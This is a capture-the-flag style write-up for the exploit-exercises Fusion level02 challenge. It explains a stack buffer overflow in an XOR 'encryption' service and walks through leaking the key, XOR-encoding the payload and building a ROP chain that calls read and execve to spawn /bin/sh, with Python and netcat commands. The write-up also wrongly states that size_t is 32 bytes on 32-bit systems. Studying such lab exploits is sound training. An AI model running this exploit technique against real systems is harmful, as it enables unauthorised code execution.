# Solution for level02

## 0x01 solution

The challenge have aslr and NX enabled

The stack overflow occurs because there is no validation of size copied in `nread(0, buffer, sz);`

Indeed
```
unsigned char buffer[32 * 4096];

while(loop) { //infinite loop
      nread(0, &op, sizeof(op)); //1st char have to be E
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz)); //length of buffer copied
              nread(0, buffer, sz); //buffer overflow
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
```

I stuck to crash the program .... it is mandatory to append 'Q' in order to get out the infinite loop and get out the function encrypt_file() in order to jump on our overwrited EIP ... don't forget that **size_t is equal to 32bytes** on 32 bytes system

since the buffer length is 32*4096=131072 lets overflow with 133000 = 0x20788

```
python -c "print('E'+'\x88\x07\x02\x00'+'A'*133000+'Q')" | nc 192.168.0.106 20002

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 6801]
0x1f8d0c5b in ?? ()
```

![gdb](png/gdb.png)

we have our EIP overwriten with strange value, the function cipher perform a xor of our input with a key
```
#define XORSZ 32
static unsigned int keybuf[XORSZ];
```
_same error unsigned int is 4 bytes long so the key is 128 bytes and not 32 ... no comment_


we can retrieve the key by sending `\x00*128 bytes because x xor 0 = x`

since we have the key, we can xor our payload with the key, since it is the same during the session (before Q exiting).

**Note** _the xor is performed on DWORD 4 bytes and not on char._

That's why, I create another array by grouping 4 char

```
def xor_level02(data,key):
    #xor is performed on unsigned int and not on char .... it is possible to use struct.unpack("I"..) but faster with s2n :)
    data=[s2n(data[i:i+4]) for i in range(0,len(data),4)]
    key=[s2n(key[i:i+4]) for i in range(0,len(key),4)]
    rez=list()
    print (len(data))

    for ind,ele in enumerate(data) :
        rez.append(n2s(ele^key[ind%32]))

    return "".join(rez)
```

since we successuly overwrite our eip, lets finish the exploit by using rop with read and execve

[0x08048a90]> afl~exec
0x080489b0    1 6            sym.imp.execve
[0x08048a90]> afl~read
0x08048860    1 6            sym.imp.read
0x0804952d    6 115          sym.nread
[0x08048a90]>

I build the following rop chain, since the PIE is not enable bss is not randomized and still writable.

* The read function will be use to write on bss our `/bin/sh` strings
* Read function is triggered by sending another packets after the payload

```
writable=elf.bss()#bss is not randomized by aslr, it will take what we send and store in bss
rop.read(0,writable,8) #ssize_t read(int fd, void *buf, size_t count);
rop.execve(writable,0,0)#int execve(const char *filename, char *const argv[], char *const envp[]);

[...]

#trigger the read function by sending /bin/sh after 'Q'
packet='Q'
r.send(packet)
log.info("Exit sent")

sleep(0.5)

packet='/bin/sh\x00'
r.send(packet)

```

![win](png/win.png)

## 0x02 reference

https://exploit-exercises.com/fusion/
